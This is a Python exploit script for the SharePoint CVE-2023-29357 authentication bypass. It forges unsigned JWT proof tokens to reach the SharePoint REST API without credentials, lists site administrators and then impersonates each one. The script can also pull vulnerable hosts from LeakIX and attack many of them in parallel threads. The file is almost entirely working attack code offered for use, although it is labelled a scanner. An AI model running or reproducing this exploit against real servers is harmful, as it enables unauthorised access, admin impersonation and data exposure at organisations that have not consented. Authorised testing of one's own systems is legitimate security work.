# SharePoint CVE-2023-29357 authentication-bypass scanner.
import json
import time
import base64
import requests
import argparse
from rich.console import Console
from urllib.parse import urlparse
from typing import Union, List, Dict
from alive_progress import alive_bar
from leakpy.scraper import LeakixScraper
from concurrent.futures import ThreadPoolExecutor, as_completed
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Shared rich console used for all status output in this script.
console = Console()
# Requests are intentionally sent with verify=False; silence urllib3's
# InsecureRequestWarning so scan output stays readable.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class SharePoint:
    """Tester for the CVE-2023-29357 SharePoint authentication bypass.

    The vulnerability allows an unsigned JWT ("alg": "none") carrying
    "ver": "hashedprooftoken" to be accepted as a valid proof token,
    granting unauthenticated access to the SharePoint REST API.
    """

    # Well-known client id used by SharePoint Online for proof tokens.
    client_id = "00000003-0000-0ff1-ce00-000000000000"

    def __init__(self, url: str, verbose: bool):
        """Initialize the tester and resolve the target's realm and audience.

        Args:
            url: Base URL of the SharePoint site (scheme + host[:port]).
            verbose: Print progress details to the console.

        Raises:
            Exception: If the realm cannot be retrieved from the target.
        """
        self.url = url.rstrip('/')
        self.hostname = urlparse(url).hostname
        self.verbose = verbose
        if self.verbose:
            console.print("[+] URL:", self.url, style="bold green")
            console.print("[+] Hostname:", self.hostname, style="bold green")
        self.realm = self.get_realm()
        self.aud = self.construct_aud_field()

    def get_realm(self) -> str:
        """Extract the tenant realm from the server's 401 bearer challenge.

        Returns:
            The realm value parsed from the WWW-Authenticate header.

        Raises:
            Exception: If the server does not answer 401, or no realm can
                be parsed out of the challenge header.
        """
        headers = {"Authorization": "Bearer "}
        response = requests.get(self.url + '/_api/web/siteusers', headers=headers, verify=False, timeout=3)
        # An empty bearer token must trigger a 401 challenge carrying the
        # realm; any other status means the endpoint cannot be exploited.
        if response.status_code != 401:
            if self.verbose:
                console.print("[-] Unable to retrieve realm", style="bold red")
            raise Exception("Unable to retrieve realm")
        www_authenticate_header = response.headers.get('WWW-Authenticate', '')
        realm = None
        for part in www_authenticate_header.split(','):
            if 'realm="' in part:
                try:
                    realm = part.split('realm="')[1].split('"')[0]
                    break
                except IndexError:
                    continue
        # Fix: the original could silently propagate None here (missing or
        # realm-less header), later producing a malformed aud "...@None".
        # Fail explicitly instead; check_url() catches this per-host.
        if realm is None:
            raise Exception("Unable to retrieve realm")
        if self.verbose:
            console.print("[+] Realm:", realm, style="bold green")
        return realm

    def construct_aud_field(self) -> str:
        """Build the JWT 'aud' claim as '<client_id>@<realm>'."""
        aud = f"{self.client_id}@{self.realm}"
        if self.verbose:
            console.print("[+] Aud Field:", aud, style="bold green")
        return aud

    @staticmethod
    def _encode_jwt(payload: Dict) -> str:
        """Serialize *payload* as an unsigned JWT ('alg': 'none').

        The 'AAA' signature segment is an arbitrary placeholder: vulnerable
        servers never verify it.
        """
        def b64(obj: Dict) -> str:
            return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b'=').decode()
        return f"{b64({'alg': 'none'})}.{b64(payload)}.AAA"

    def spoof_admin_users(self, admin_users: List[Dict[str, str]]) -> None:
        """Impersonate each discovered site admin at /_api/web/currentuser.

        Args:
            admin_users: Dicts with 'Title', 'Email', 'NameId' and
                'NameIdIssuer' keys as produced by authenticate_with_token().
        """
        current_time = int(time.time())
        expiration_time = current_time + 3600
        for user in admin_users:
            payload = {
                "aud": self.aud,
                "iss": self.client_id,
                "nbf": current_time,
                "exp": expiration_time,
                "ver": "hashedprooftoken",
                "nameid": user.get("NameId", ""),
                "nii": user.get("NameIdIssuer", ""),
                "endpointurl": "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=",
                "endpointurlLength": 1,
                "isloopback": True,
                "isuser": True
            }
            jwt_token = self._encode_jwt(payload)
            headers = {
                "Accept": "application/json",
                "Authorization": f"Bearer {jwt_token}",
                "X-PROOF_TOKEN": jwt_token,
            }
            endpoint_url = self.url + '/_api/web/currentuser'
            response = requests.get(endpoint_url, headers=headers, verify=False, timeout=5)
            if response.status_code == 200:
                try:
                    parsed_response = json.loads(response.text)
                    console.print(f"[+] Spoofing succeeded for {user.get('Title', 'Unknown User')}: {user.get('Email', 'N/A')} at '/_api/web/currentuser'", style="bold green")
                    console.print(json.dumps(parsed_response, indent=4), style="bold green")
                except json.JSONDecodeError:
                    console.print(f"[+] Spoofing succeeded for {user.get('Title', 'Unknown User')}: {user.get('Email', 'N/A')} at '/_api/web/currentuser'", style="bold green")
                    console.print(f"Received non-JSON response:\n{response.text}", style="bold yellow")
            else:
                console.print(f"[-] Spoofing failed for {user.get('Title', 'Unknown User')}: {user.get('Email', 'N/A')} at '/_api/web/currentuser'. Status code: {response.status_code}", style="bold red")

    def create_jwt_token(self) -> str:
        """Forge the unsigned proof token used for the initial bypass."""
        current_time = int(time.time())
        expiration_time = current_time + 3600
        payload = {
            "aud": self.aud,
            "iss": self.client_id,
            "nbf": current_time,
            "exp": expiration_time,
            "ver": "hashedprooftoken",
            "nameid": f'{self.client_id}@{self.realm}',
            "endpointurl": "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=",
            "endpointurlLength": 1,
            "isloopback": True
        }
        jwt_token = self._encode_jwt(payload)
        if self.verbose:
            console.print("[+] JWT Token:", jwt_token, style="bold green")
        return jwt_token

    def authenticate_with_token(self, token: str) -> Union[bool, List[Dict[str, str]]]:
        """Try the forged token against /_api/web/siteusers.

        Returns:
            A list of site-admin info dicts on success; True when
            authentication succeeded but no admin list could be extracted
            (or the body was not JSON); False when authentication failed.
        """
        headers = {
            "Accept": "application/json",
            "Authorization": f"Bearer {token}",
            "X-PROOF_TOKEN": token,
        }
        response = requests.get(self.url + '/_api/web/siteusers', headers=headers, verify=False, timeout=5)
        if self.verbose:
            console.print("[!] Attempting authentication for", self.url, "with token", style="bold yellow")
        if response.status_code != 200:
            if self.verbose:
                console.print("[-] Authentication failed for", self.url, ". Status code:", response.status_code, style="bold red")
            return False
        try:
            parsed_response = json.loads(response.text)
        except json.JSONDecodeError:
            if self.verbose:
                console.print(f"[+] Authenticated successfully for {self.url} but failed to parse the response text as JSON\nResponse Text: {response.text}", style="bold yellow")
            return True
        users = parsed_response.get('value', [])
        admin_users = [user for user in users if user.get('IsSiteAdmin', False) is True]
        admin_info_list = [
            {
                "Title": user.get('Title', 'N/A'),
                "Email": user.get('Email', 'N/A'),
                "NameId": user.get('UserId', {}).get('NameId', 'N/A'),
                "NameIdIssuer": user.get('UserId', {}).get('NameIdIssuer', 'N/A')
            }
            for user in admin_users
        ]
        console.print(f"[+] Authenticated successfully for {self.url}\n", style="bold green")
        if self.verbose and admin_users:
            for admin_info in admin_info_list:
                console.print(json.dumps(admin_info, indent=2), style="bold green")
                console.print("=+"*20, style="bold green")
        return admin_info_list if admin_info_list else True
def check_url(url: str, output_file: str = None, verbose: bool = False, mass_exploit: bool = False):
    """Probe a single SharePoint URL for the authentication bypass.

    Forges an unsigned JWT and attempts authentication; on success the URL
    is appended to *output_file*, and in single-target mode the discovered
    site admins are additionally impersonated.  All errors are swallowed
    (reported only when *verbose* is set) so a mass scan never aborts on
    one bad host.
    """
    try:
        target = SharePoint(url, verbose=verbose)
        result = target.authenticate_with_token(target.create_jwt_token())
        if not result:
            return
        if output_file:
            with open(output_file, 'a') as handle:
                handle.write(f"{url}\n")
        # Admin spoofing is only attempted for single-target runs where the
        # admin list could actually be extracted.
        if isinstance(result, list) and not mass_exploit:
            target.spoof_admin_users(result)
    except Exception as exc:
        if verbose:
            console.print("[!] Error in check_url:", str(exc), style="bold red")
def fetch_from_leakix(fields="protocol, host, port", bulk=False, pages=2):
    """Query LeakIX for hosts flagged by its SharePointPlugin leak plugin.

    Returns a deduplicated list of 'protocol://host:port' URLs, preserving
    first-seen order.  Exits the program when no API key is configured.
    """
    LEAKIX_API_KEY = "" # Configure this line with your LeakIX Pro API Key to use LeakPy
    if not LEAKIX_API_KEY:
        console.print("[bold red]Please configure the Leakix API key.[/bold red]")
        exit(1)
    scraper = LeakixScraper(api_key=LEAKIX_API_KEY, verbose=True)
    hits = scraper.execute(
        scope="leak",
        query='+plugin:SharePointPlugin',
        fields=fields,
        pages=pages,
        use_bulk=bulk,
    )
    # dict.fromkeys deduplicates while keeping insertion order.
    unique_urls = dict.fromkeys(
        f'{hit.get("protocol")}://{hit.get("host")}:{hit.get("port")}' for hit in hits
    )
    return list(unique_urls)
def main():
    """Command-line entry point: parse arguments, gather targets and scan."""
    parser = argparse.ArgumentParser(description='Mass tester for SharePoint CVE-2023–29357 Authentication Bypass.')
    parser.add_argument('-u', '--url', type=str, help='The base url for the requests', required=False)
    parser.add_argument('-l', '--list', type=str, help='File containing a list of base urls to scan', required=False)
    parser.add_argument('-t', '--threads', type=int, help='Number of threads to use', default=10)
    parser.add_argument('-o', '--output', type=str, help='File to output vulnerable urls', default='output.txt')
    parser.add_argument('-v', '--verbose', action='store_true', help='Print verbose output', default=False)
    parser.add_argument('--leakpy', action='store_true', help="Use Leakix to fetch URLs based on leaks")
    parser.add_argument('--bulk', action='store_true', help="Use bulk_mode on LeakIX (Pro API Key only)")
    parser.add_argument('--pages', type=int, default=2, help="Page results on LeakIX")
    args = parser.parse_args()

    # Target sources in priority order: LeakIX, input file, single URL.
    if args.leakpy:
        targets = fetch_from_leakix(bulk=args.bulk, pages=args.pages)
    elif args.list:
        with open(args.list, 'r') as handle:
            targets = [line.strip() for line in handle]
    elif args.url:
        targets = [args.url]
    else:
        targets = []

    if not targets:
        console.print("[red]Please provide a url or a file with a list of base urls to scan.[/red]")
        return

    if len(targets) > 1 and (args.leakpy or args.list):
        # Mass mode: fan out over a thread pool with a progress bar.
        with ThreadPoolExecutor(max_workers=args.threads) as pool, alive_bar(len(targets), bar='smooth', enrich_print=False) as bar:
            pending = {pool.submit(check_url, target, args.output, args.verbose, mass_exploit=True): target for target in targets}
            for _ in as_completed(pending):
                bar()
    else:
        check_url(targets[0], args.output, args.verbose, mass_exploit=False)
# Run the CLI only when this file is executed as a script.
if __name__ == "__main__":
    main()